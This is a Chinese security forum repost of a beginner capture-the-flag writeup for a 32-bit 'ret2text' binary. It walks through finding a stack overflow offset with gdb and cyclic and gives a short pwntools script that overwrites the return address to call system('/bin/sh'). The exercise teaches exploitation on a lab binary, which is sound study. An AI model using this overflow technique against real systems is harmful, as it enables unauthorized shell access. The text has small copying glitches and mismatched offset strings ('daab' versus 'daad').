安全矩阵

 找回密码
 立即注册
搜索
查看: 2813|回复: 0

看雪--一鸣惊人

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-4-2 13:49:17 | 显示全部楼层 |阅读模式
原题链接https://ctf.pediy.com/itembank.htm
附件

writeup:
这是一道入⻔的pwn题

1. 拿到题先用file命令查看⼀下文件信息



可以看到是32-bit 的elf文件,⽤32位的IDA打开。


2. 首先进⼊main函数,F5反编译后分析代码


定位到输⼊入的参数&s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system()函数,参数 为/bin/sh,拿到系统权限,所以先用gdb分析一下分配空间以及返回地址。



3. 文件正常执⾏如下


根据查询的s的地址⼤大⼩小,⽤用cyclic⽣生成200个字符尝试覆盖,在gdb中运⾏行行查看状态


可以看到程序停止在了‘daab’的地址,即下一个地址为返回地址
  1. cyclic -l daad
复制代码
之后根据 call _system() 的地址构造payload,python代码如下
  1. from pwn import *
  2. sh = process('./ret2text')
  3. target = 0x804863a
  4. payload = 'a'*112 + p32(target)
  5. sh.sendline(payload)
  6. sh.interactive()
复制代码
执⾏行行脚本之后拿到系统权限




原⽂链接: https://blog.csdn.net/m1785717/article/details/82494605



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-10-7 14:04 , Processed in 0.014857 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表